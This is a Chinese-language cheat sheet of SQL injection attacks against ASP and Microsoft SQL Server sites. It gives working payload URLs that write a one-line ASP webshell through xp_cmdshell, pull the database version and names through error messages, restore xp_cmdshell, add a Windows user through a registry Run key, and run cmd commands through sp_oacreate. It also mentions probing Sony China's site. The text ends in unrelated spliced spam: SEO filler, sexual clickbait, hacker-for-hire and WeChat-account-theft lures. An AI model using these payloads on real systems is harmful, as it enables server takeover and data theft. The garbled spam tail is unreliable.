1、用^转义字符来写ASP(一句话木马)文件的 *** :
?http://192.168.1.5/display.asp?keyno=1881;execmaster.dbo.xp_cmdshell'echo^executerequest^(l^)^^>>c:\mu.asp';--
?echo^<%execute^(request^(l^)^)%^>>c:\mu.asp
2、显示SQL系统版本:
?http://192.168.1.5/display.asp?keyno=188and1=(select@@VERSION)
?http://www.xxxx.com/FullStory.asp?id=1and1=convert(int,@@version)--
MicrosoftVBScript编译器错误错误'800a03f6'
缺少'End'
/iisHelp/common/500-100.asp,行242
MicrosoftOLEDBProviderforODBCDrivers错误'80040e07'
[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue'MicrosoftSQLServer2000-8.00.760(IntelX86)Dec17200214:22:05Copyright(c)1988-2003MicrosoftCorporationDesktopEngineonWindowsNT5.0(Build2195:ServicePack4)'toacolumnofdatatypeint.
/display.asp,行17
3、在检测索尼中国的网站漏洞时,分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以使用“in”关键字进行查询,例如“select*frommytablewhereidin(1)”,括号中的值就是我们提交的数据,它的结果与使用“select*frommytablewhereid=1”的查询结果完全相同。所以访问页面的时候在URL后面加上“)and1=1and1in(1”后原来的SQL语句就变成了“select*frommytablewhereidin(1)and1=1and1in(1)”,这样就会出现期待已久的页面了。暂且就叫这种类型的漏洞为“包含数字型”吧,聪明的你一定想到了还有“包含字符型”呢。对了,它就是由于类似“select*frommytablewherenamein('firstsee')”的查询语句造成的。
4、判断xp_cmdshell扩展存储过程是否存在:
http://192.168.1.5/display.asp?keyno=188and1=(selectcount(*)FROMmaster.dbo.sysobjectswherextype='X'ANDname='xp_cmdshell')
恢复xp_cmdshell扩展存储的命令:
http://www.test.com/news/show1.asp?NewsId=125272
;execmaster.dbo.sp_addextendedproc'xp_cmdshell','e:\inetput\web\xplog70.dll';--
5、向启动组中写入命令行和执行程序:
http://192.168.1.5/display.asp?keyno=188;EXECmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe/cnetusertestptlove/add'
6、查看当前的数据库名称:
?http://192.168.1.5/display.asp?keyno=188and0<>db_name(n)n改成0,1,2,3……就可以跨库了
?http://www.xxxx.com/FullStory.asp?id=1and1=convert(int,db_name())--
MicrosoftVBScript编译器错误错误'800a03f6'
缺少'End'
/iisHelp/common/500-100.asp,行242
MicrosoftOLEDBProviderforODBCDrivers错误'80040e07'
[Microsoft][ODBCSQLServerDriver][SQLServer]Syntaxerrorconvertingthenvarcharvalue'huidahouse'toacolumnofdatatypeint.
/display.asp,行17
7、列出当前所有的数据库名称:
select*frommaster.dbo.sysdatabases列出所有列的记录
selectnamefrommaster.dbo.sysdatabases仅列出name列的记录
8、不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令:
createTABLEmytmp(infoVARCHAR(400),IDintIDENTITY(1,1)NOTNULL)
DECLARE@shellINT
DECLARE@fsoINT
DECLARE@fileINT
DECLARE@isEndBIT
DECLARE@outVARCHAR(400)
EXECsp_oacreate'wscript.shell',@shelloutput
EXECsp_oamethod@shell,'run',null,'cmd.exe/cdirc:\>c:\temp.txt','0','true'
--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。
EXECsp_oacreate'scripting.filesystemobject',@fsooutput
EXECsp_oamethod@fso,'opentextfile',@fileout,'c:\temp.txt'
--因为fso的opentextfile *** 将返回一个textstream对象,所以此时@file是一个对象令牌
当我们刚开始搜索引擎优化时,搜索引擎优化专家常常和我们谈论搜索引擎的自然排名。起初,很多搜索引擎优化初学者不知道自然排名意味着什么。厥后,在这个行业呆了很长时间后,他们逐步大白了百度自然排名的重要性。...
如何性交(正确性爱的全过程) 豆瓣评分9.2,近3万人观看,上万条短评。 超过60% 的观众打出了5星,被称之为2020评分最高的日本剧集。 这些标签,都指向同一部日剧——《17.3关于...
$ra=@$r["HTTP_ACCEPT_LANGUAGE"];[1][2]黑客接单 以下部分供给了有关每个歹意域的更多详细信息:3.01 2.运用共同技能躲避阻拦否(ehtools)> sca...
在生活中我们难免会看一些人很不顺眼,觉得他得微信里面有很多好东西,所以我没时常想要有这么一个念头,就是把对方的微信给盗了。但是碍于实际的情况,我们也不知道要怎么才能盗掉别人的微信。其实生活中有很多这样...
本文导读目录: 1、哪里有的下载电脑黑客帝国数字雨动态壁纸,求网址 2、谁给我一个黑客帝国动态数字雨大图桌面壁纸? 3、安卓手机被莫名其妙换了桌面壁纸,是被黑客入侵了吗 4、谁有黑客专用墙...
近期很多人都会去玩手机微信的拍一拍作用,由于手机微信拍一拍加上了后缀名文本作用,给自的拍一拍后边编写一个又有创意又搞笑的文案,当他人拍你的情况下便会十分好玩。那麼手机微信拍一拍后缀名如何设置?手机微信...